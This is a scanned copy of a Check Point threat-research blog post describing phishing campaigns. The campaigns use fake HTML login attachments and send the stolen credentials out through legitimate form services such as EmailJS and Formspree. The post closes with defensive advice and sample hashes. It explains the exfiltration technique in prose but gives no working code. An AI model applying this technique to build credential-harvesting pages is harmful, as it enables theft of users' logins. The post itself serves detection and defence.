blog.checkpoint.com
Open in
urlscan Pro
18.164.52.54
Public Scan
URL:
https://blog.checkpoint.com/security/sign-in-to-continue-and-suffer-attackers-abusing-legitimate-services-for-credential-the...
Submission: On June 21 via api from DE — Scanned from DE
Submission: On June 21 via api from DE — Scanned from DE
Form analysis
3 forms found in the DOM<form id="search-form">
<input type="image" src="/wp-content/themes/atoms/images/search-btn.png" value="Submit" alt="Search"><input type="text" id="stq" name="stq" class="st-search-input" placeholder="Enter your keywords..." x-webkit-speech=""
x-webkit-grammar="builtin:search" autocomplete="off" aria-label="Search Term">
</form>
<form id="search-form1">
<label style="display: none;">Search</label>
<input type="image" src="https://www.checkpoint.com/wp-content/themes/checkpoint-theme-v2/images/search-btn.png" value="Submit" alt="Search"><input type="text" id="stq1" name="stq1" class="st-search-input" placeholder="Enter your keywords..."
x-webkit-speech="" x-webkit-grammar="builtin:search" autocomplete="off" aria-label="Search Term">
</form>
GET /
<form action="/" id="searchform" class="search-form" method="get">
<div class="form-group">
<input type="search" name="s" class="search-form__input" autocomplete="off" placeholder="Search ...">
<button type="submit" class="btn search-form__submit"><i class="atbs-atoms-icon-right-arrow"></i></button>
</div>
</form>
Text Content
Free Demo! Contact Us Support Center Sign In Blog * Search * * Geo Menu * * Choose your language... * English (English) * Spanish (Español) * French (Français) * German (Deutsch) * Italian (Italiano) * Portuguese (Português) * Russian (Русский) * Japanese (日本語) * Chinese (中文) * Czech (čeština) * Indonesian (Bahasa Indonesia) * Korean (한국어) * Dutch (Nederlands) * Polish (Polszczyzna) * Turkish (Türkçe) * Taiwan (繁體中文) * Vietnamese (Tiếng Việt) * Products * QUANTUM * Quantum Maestro * Quantum Lightspeed * Quantum Security Gateway * Quantum SD-WAN * Quantum Spark * Quantum IoT Protect * Quantum VPN * Quantum Smart-1 * Quantum Smart-1 Cloud * Quantum Cyber Security Platform * CLOUDGUARD * CloudGuard Network * CloudGuard Private Cloud * CloudGuard Public Cloud * CloudGuard CNAPP * CloudGuard Posture Management * CloudGuard Workload * CloudGuard AppSec * CloudGuard Intelligence * CloudGuard Spectral * HARMONY * Harmony Endpoint * Harmony Connect (SASE) * Harmony Browse * Harmony Email & Collaboration * Harmony Mobile * HORIZON * Horizon MDR/MPR * Horizon XDR/XPR * Horizon Events * ThreatCloud * Infinity Portal * View All Products A-Z > * Increase Protection and Reduce TCO with a Consolidated Security Architecture DISCOVER Products Overview * Solutions * Cloud Security * Cloud Migration Security * Compliance in the Cloud * Cloud Threat Hunting * Developer Security -------------------------------------------------------------------------------- Cloud Providers * AWS Cloud * Azure Cloud * Google Cloud * Network Security * Hybrid Data Center * SD-WAN Security * Zero Trust Security * IoT Security * Users & Access Security * Secure Access Service Edge (SASE) * Endpoint Security * Mobile Security * Anti-Ransomware * Anti-Phishing -------------------------------------------------------------------------------- Security Operations * Zero-Day Protection * Industry * Retail * Financial Services * Government * Healthcare * Industrial Control Systems ICS & SCADA * Telco / Service Provider * Education -------------------------------------------------------------------------------- Business Size * Large Enterprise * Small & Medium Business * Consumer & Small Business * Solutions Overview > * Increase Protection and Reduce TCO with a Consolidated Security Architecture DISCOVER * Support & Services * Support * Create/View Service Request * Contact Support * Check Point Pro * Support Programs * Life Cycle Policy * License Agreement & Warranty * RMA Policy * Training * Mind * Training & Certification * Cyber Park * Secure Academy * SmartAwareness * eLearning * Redeem CLC Credits * Services * Infinity Global Services * Professional Services * Account Management * Lifecycle Management Services * Security Consulting * Incident Response Services * Find a Freelance Certified Consultant * HackingPoint Training Learn hackers inside secrets to beat them at their own game. VIEW COURSES * Partners * Channel Partners * Become a Partner * MSSP Partner Program * Global Systems Integrators * SMB Partners * Find a Partner * Technology Partners * Featured Technology Partners * AWS Cloud * Azure Cloud * Partner Portal * Product Catalog * Renewal Tool * Partner Dashboard * Campaign Central * Campaign Marketplace * Francisco Criado Check Point's VP, Global Partner Ecosystem Organization LEARN MORE * Resources * Resources * Content Resource Center * Product Demos * Product Trials * Customer Stories * Events * Webinars * Videos * Cyber Hub * Downloads & Documentation * Downloads & Documentation * Product Catalog * Renewal Pricing Tool * Cyber Security Insights * Check Point Blog * Check Point Research * Cyber Talk for Executives * CheckMates Community * * Search * Search * Geo Menu * Choose your language... * English (English) * Spanish (Español) * French (Français) * German (Deutsch) * Italian (Italiano) * Portuguese (Português) * Russian (Русский) * Japanese (日本語) * Chinese (中文) * Czech (čeština) * Indonesian (Bahasa Indonesia) * Korean (한국어) * Dutch (Nederlands) * Polish (Polszczyzna) * Turkish (Türkçe) * Taiwan (繁體中文) * Vietnamese (Tiếng Việt) Toggle Navigation Blog Home > Security > ‘Sign in to continue’ and suffer : Attackers abusing legitimate services for credential theft Filter by: Select category Research (520) Security (803) Securing the Cloud (248) Harmony (109) Company and Culture (7) Innovation (5) Customer Stories (4) Horizon (1) Securing the Network (3) Connect SASE (4) Harmony Email (11) Artificial Intelligence (9) SecurityJune 19, 2023 ‘SIGN IN TO CONTINUE’ AND SUFFER : ATTACKERS ABUSING LEGITIMATE SERVICES FOR CREDENTIAL THEFT ByCheck Point Team Share * * * * * HIGHLIGHTS: * CHECK POINT RESEARCH (CPR) DETECTED AN ONGOING PHISHING CAMPAIGN THAT USES LEGITIMATE SERVICES FOR CREDENTIAL HARVESTING AND DATA EXFILTRATION IN ORDER TO EVADE DETECTION. * HTML FILES ARE ONE OF THE MOST COMMON ATTACK VECTORS AND ARE USED BY ATTACKERS FOR PHISHING, AND OTHER SCAMS * CHECK POINT SOFTWARE’S CUSTOMERS REMAIN PROTECTED AGAINST THIS ATTACK INTRODUCTION According to Check Point Harmony Email Researchers, credential harvesting has continually been the top attack vector, with 59% of attacks reported. It also plays a major role in ‘Business Email Compromise (BEC), ranging to 15% of attacks made. In order to steal and harvest the user’s credentials, phishing emails contain a malicious URL or attachment. According to Check Point’s telemetry, more than 50% of malicious attachments are HTML files. In order to trick the user, many of those attachments are in the form of a disguised login page of known services and vendors such as Microsoft, Webmail, etc. Figure 1: Malicious attachments by file type. Source: Check Point Research The user enters his credentials in the spoofed login form – clicks submit – and the credentials are sent to the malicious actor, usually by a web-server or Telegram’s API. During the past few months, CPR have observed ongoing campaigns involving thousands of emails which take advantage of legitimate services including EmailJS, Formbold, Formspree and Formspark in order to harvest these stolen credentials. These services are all online form builders that allow you to create custom forms for your website or web application and are used by many developers. These services provide a user-friendly interface for building forms that can be embedded on your website or application. They may offer various form field types, such as text input fields, radio buttons, checkboxes, dropdown menus, and more, to allow you to collect information from users in a structured way. Once a user submits the form, the service will handle the processing of the form data and harvest these stolen credentials. Figure 2: Credential harvesting process CREDENTIAL HARVESTING Credential harvesting is a type of cyberattack in which malicious actors acquire sensitive information such as usernames and passwords to gain initial access to an organization or to sell it online. Many times, those attacks do not target a specific organization but try to gather as many different usernames and passwords to sell them online. Figure 3: Dark web forum selling stolen credentials. TECHNIQUE OVERVIEW In the past, attackers used two main methods to harvest the credentials. The first way is to use a PHP file hosted on a compromised site. However, in this method, attackers are faced with the possibility of the site getting blocked by network security solutions. The second method is by using Telegram’s API but this method is widely known by security vendors, which makes it more likely to be blocked. This new method of using a legitimate form service’s API, which is also used by many developers, makes malicious HTML files harder to block. By using this API, the credentials can be sent to wherever the attacker chooses to. It could even be to his own mailbox. EMAILJS Let us take EmailJS as an example. EmailJS is a service that allows developers to send emails using client-side technology only without any server code. In order to use their service, all one needs to do is – 1. Connect an email address to the service. 2. Create an email template, in order to decide how to send the email and to which email address. 3. Use their SDK or API, to send emails using JavaScript. The service is free up to 200 emails per month, and by subscribing you can send up to 100,000 emails per month. The service is legitimate and is used by more than 25,000 developers according to their official website. Figure 4: EmailJS official website Here are two examples of how malicious actors are using this service to harvest stolen credentials – Figure 5: Phishing page using EmailJS In figure 5, the attacker first uses “emailJS.init” with his public key and then by using the function “sendEmail, which is triggered when the user submits the form, and “emailjs.send” the attacker transfers the data to his email account by mail. Figure 6: Another example using EmailJS from the HTML file In Figure 6 the attacker uses the EmailJS API directly to send himself the victim’s credentials. The above examples were used in the campaign we observed. Also, we found two different EmailJS public API keys that were used in the campaign. AN ONGOING CAMPAIGN – OVERVIEW One of the ongoing campaigns we detected starts with a phishing email conveying a sense of urgency from the user to make one open the attachment. The campaign involved multiple versions of the email itself and a few different HTML templates. Figure 7: Example of a phishing email used in the campaign he attached file corresponds to the email that the victim received, and we saw multiple versions of it. Figure 8: HTML attachments masquerade as document and webmail sign in To make the sign-in page seem more legitimate, the campaign author already fills out the victim’s email address in the form, which is hardcoded in the HTML file. Once the victim enters his credentials and tries to log in, the username and password are sent straight to the attacker, straight to his email inbox. Figure 9: Credential harvesting process using EmailJS Figure 10: Example of a HTML attachment using Formspark CONCLUSION We observed a rise in the use of legitimate services by attackers, which makes it harder to defend against and can lead to credential theft in the organization. CHECK POINT CUSTOMERS REMAIN PROTECTED AGAINST THESE KIND OF PHISHING ATTACKS. Check Point Threat Emulation customers are protected against this attack. The speed and sophistication of evasive zero-day and phishing attacks requires AI Deep Learning to predict and block malicious behavior without human intervention. Check Point Titan revolutionizes threat prevention and security management with AI Deep Learning, advanced cloud services, integrated IoT security, and firewall auto scaling performance for mission critical applications. PHISHING PREVENTION Check Point achieved an amazing score in phishing prevention (99.9%) in the Miercom Benchmark report scoring 99.7% in malware prevention tests and nearly 0% in missed detections of phising, malicious malware and zero-day phishing URLs. HOW TO SPOT PHISHING EMAILS & STAY PROTECTED Phishing attacks pose a significant threat to enterprise cybersecurity because they are designed to exploit an organization’s employees, rather than vulnerabilities in its software or cybersecurity infrastructure. The prevalence of phishing attacks and the risk that they pose to an organization makes it critical for an organization to take steps targeted specifically toward protecting against phishing attacks, including: 1. Security Awareness Training:Phishing emails are designed to trick employees into taking a certain action. Training employees to recognize and correctly respond to attempted phishing attacks is essential for mitigating the phishing threat. 2. Email Filtering:Phishers will sometimes use a similar email to the legitimate one such as user@cornpany.com instead of user@company.com or even leverage malicious links. To check on this, hover over a link with the mouse and verify that it goes to the right place before clicking it. Many of the common phishing techniques, such as malicious links and lookalike email addresses can be detected by the software. An email filtering solution can identify phishing emails based on these warning signs and block them from reaching the intended recipient’s inbox. 3. Scan for Malicious Attachments:Malicious attachments are a common means of delivering malware via email. Scanning for malicious attachments and evaluating them in a sandboxed environment enables an organization to detect and prevent this malware delivery. 4. Watch for Spelling and Grammar:Phishing emails commonly contain spelling mistakes and grammatical errors. If an email sounds wrong or does not match the alleged sender’s voice, then it is probably a scam. 5. DLP Solution:Some phishing attacks are designed to steal sensitive information from an organization via email. A data loss prevention (DLP) solution can help to detect and block this attempted exfiltration. 6. Anti-Phishing Solution: An anti-phishing solution will integrate many of these technological protections as well as other anti-phishing features. Deploying one provides an organization with comprehensive protection against phishing threats. IOCs EmailJS Samples 053c0cd2f56b2d8276d0c5e11cbe3a5c96ec278d d36908ce63f5386ddffaa390a0baef6a045e2254 FormSpark Samples 2c6fe45dbf760970b624b08cb1ff7bc5a5e21aa8 56b2d8a45e34384c4eb2c886037f22c9c90f3721 FormSpree Samples b07876f8254667e0f023559eed548de7ad967941 4c4a0d818dff16566e4bbad0d3e3fbba18e7063d FormBold Samples f82fb2f5f17a5bad4a0dce32ceaea377fe78c905 5da1c26703a80b3f8e663461ef9d612b4ccdee38 0 295 YOU MAY ALSO LIKE Security June 21, 2023 PHISHING TOOLS FOR PURCHASE: A CLOSER LOOK AT FACEBOOK SCAMMING GROUPS By Gal Yogev Highlights: Facebook groups are hosting scammers who ... Security June 16, 2023 PREVENTING CYBER ATTACKS IS CRITICAL TO IMPROVE HEALTHCARE OUTCOMES It’s become painfully obvious that cybersecurity is critical to enabling ... Securing the Cloud June 16, 2023 PYPI SUSPENDS NEW REGISTRATIONS AFTER MALICIOUS PYTHON SCRIPT ATTACK PyPI, the official repository for Python packages, has recently announced ... Security June 15, 2023 MASSIVE GLOBAL SCALE PHISHING CAMPAIGN USING MALICIOUS PDFS, IDENTIFIED AND BLOCKED BY NEW THREATCLOUD AI ENGINE Highlights: Check Point has recently identified and blocked a massive ... -------------------------------------------------------------------------------- Follow Us YOU DESERVE THE BEST SECURITY™ ©1994-2023 Check Point Software Technologies Ltd. All rights reserved. Copyright | Privacy Policy This website uses cookies in order to optimize your user experience as well as for advertising and analytics. For further information, please read our Privacy Policy and ourCookie Notice. Cookies Settings Reject All Accept When you visit any website, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalized web experience. Because we respect your right to privacy, you can choose not to allow some types of cookies. Click on the different category headings to find out more and change our default settings. However, blocking some types of cookies may impact your experience of the site and the services we are able to offer. More information Allow All MANAGE CONSENT PREFERENCES FUNCTIONAL COOKIES Functional Cookies These cookies enable the website to provide enhanced functionality and personalisation. They may be set by us or by third party providers whose services we have added to our pages. If you do not allow these cookies then some or all of these services may not function properly. STRICTLY NECESSARY COOKIES Always Active These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information. PERFORMANCE COOKIES Performance Cookies These cookies allow us to count visits and traffic sources so we can measure and improve the performance of our site. They help us to know which pages are the most and least popular and see how visitors move around the site. All information these cookies collect is aggregated and therefore anonymous. If you do not allow these cookies we will not know when you have visited our site, and will not be able to monitor its performance. TARGETING COOKIES Targeting Cookies These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites. They do not store directly personal information, but are based on uniquely identifying your browser and internet device. If you do not allow these cookies, you will experience less targeted advertising. Back Button PERFORMANCE COOKIES Search Icon Filter Icon Clear checkbox label label Apply Cancel Consent Leg.Interest checkbox label label checkbox label label checkbox label label Reject All Confirm My Choices